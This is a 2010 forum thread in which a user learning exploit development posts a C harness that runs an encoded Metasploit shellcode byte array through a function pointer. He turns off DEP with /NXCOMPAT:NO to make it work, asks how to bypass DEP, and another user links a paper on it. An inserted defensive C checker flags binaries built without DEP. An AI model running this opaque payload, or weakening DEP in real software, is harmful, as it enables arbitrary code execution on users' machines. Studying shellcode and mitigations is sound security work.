Testing shellcode in C/C++

zeroflaw

Full Member

Posts: 208

Joined: Fri Feb 12, 2010 10:41 am

Location: Holland, Den Helder

Post Mon Feb 15, 2010 8:56 am

Testing shellcode in C/C++

Instead of using shellcode from generators etc., I decided to learn how to write shellcode myself. So the first step would be writing something that can test the shellcode before I attempt to use it in exploits.

I googled around a bit and found a few C/C++ examples of how to do it. It makes use of a function pointer that points to the shellcode buffer. Well, I keep getting an exception about some access violation. I don't really like to ask questions, because maybe I should google around some more and find out on my own. I'm not sure if there's something wrong with the shellcode because I don't know how to write it yet.

Here's my code; I compiled it with Microsoft Visual C++ 2008.

  Code:
#include <stdio.h>

// The x86 shellcode to run. Generated with Metasploit.
char shellCode[] =
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int main()
{
    void (*shell)(); // Function pointer.
    shell = (void(*)()) (&shellCode);

    printf("Shellcode at: %p\n", shellCode);
    printf("Function pointer points to: %p\n", shell);

    // Run it!
    printf("Running shellcode...\n");
    shell();

    return 0;
}



And I'm getting this from the assembly. I see it fails after the call to the shellcode.

  Code:
    // Run it!
    shell();
                008813FC 8B F4            mov         esi,esp
                008813FE FF 55 F8         call        dword ptr [shell]
breaks here --> 00881401 3B F4            cmp         esi,esp
                00881403 E8 33 FD FF FF   call        @ILT+310(__RTC_CheckEsp) (88113Bh)



I hope you guys can help me! Or at least point me in the right direction. Thanks in advance.

ZF
Last edited by zeroflaw on Mon Feb 15, 2010 10:23 am, edited 1 time in total.
ZF
zeroflaw

Post Mon Feb 15, 2010 10:08 am

Re: Testing shellcode in C/C++

Never mind, guys, I found the solution. Apparently the "Data Execution Prevention" or DEP kicked in, preventing code from running in the non-executable memory regions.

Compiling with "/NXCOMPAT:NO" prevents this from happening. Now I can finally test my shellcode :P

Btw, does anyone know how to bypass this? Will DEP render all buffer overflow exploits useless?

ZF
ZF
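
The /NXCOMPAT:NO switch mentioned in the post above clears the NX_COMPAT bit (0x0100) in the DllCharacteristics field of the PE optional header. As an added example that is not part of the original thread, this C check reads that bit so a build or audit step can flag binaries that opted out of DEP; pe_nx_compat and make_sample are hypothetical names, and the sample header bytes are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NX_COMPAT 0x0100u /* IMAGE_DLLCHARACTERISTICS_NX_COMPAT */

/* Little-endian reads that do not assume alignment. */
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const unsigned char *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* Returns 1 if the image opts in to DEP, 0 if it does not
   (as after linking with /NXCOMPAT:NO), -1 if buf is not a parsable PE. */
int pe_nx_compat(const unsigned char *buf, size_t len)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return -1;
    uint32_t pe = rd32(buf + 0x3C);                  /* e_lfanew */
    /* Need signature (4) + COFF header (20) + optional header up to offset 72. */
    if (pe > len || len - pe < 4 + 20 + 72) return -1;
    if (memcmp(buf + pe, "PE\0\0", 4) != 0) return -1;
    const unsigned char *opt = buf + pe + 24;
    uint16_t magic = rd16(opt);
    if (magic != 0x10B && magic != 0x20B) return -1; /* PE32 or PE32+ */
    /* DllCharacteristics sits at offset 70 in both header variants. */
    return (rd16(opt + 70) & NX_COMPAT) ? 1 : 0;
}

/* Constructed sample: the smallest header the parser above accepts. */
size_t make_sample(unsigned char *out, size_t cap, uint16_t dll_chars)
{
    const size_t pe = 0x80, total = pe + 24 + 72;
    if (cap < total) return 0;
    memset(out, 0, total);
    out[0] = 'M'; out[1] = 'Z';
    out[0x3C] = (unsigned char)pe;
    memcpy(out + pe, "PE\0\0", 4);
    out[pe + 24] = 0x0B; out[pe + 25] = 0x01;        /* PE32 magic */
    out[pe + 24 + 70] = (unsigned char)(dll_chars & 0xFF);
    out[pe + 24 + 71] = (unsigned char)(dll_chars >> 8);
    return total;
}

int main(void)
{
    unsigned char img[256];
    size_t n = make_sample(img, sizeof img, 0x0140); /* DYNAMIC_BASE | NX_COMPAT */
    printf("NX_COMPAT set:     %d\n", pe_nx_compat(img, n));
    n = make_sample(img, sizeof img, 0x0040);        /* NX_COMPAT cleared */
    printf("NX_COMPAT cleared: %d\n", pe_nx_compat(img, n));
    return 0;
}
```

A result of 0 on a shipped binary means DEP is not enforced for it by default on systems using the opt-in policy.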
Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Mon Feb 15, 2010 11:50 am

Re: Testing shellcode in C/C++

I had a nice paper on bypassing DEP, but I can't find it anywhere. I did find this one:

http://www.milw0rm.com/papers/161
~~~~~~~~~~~~~~
Ketchup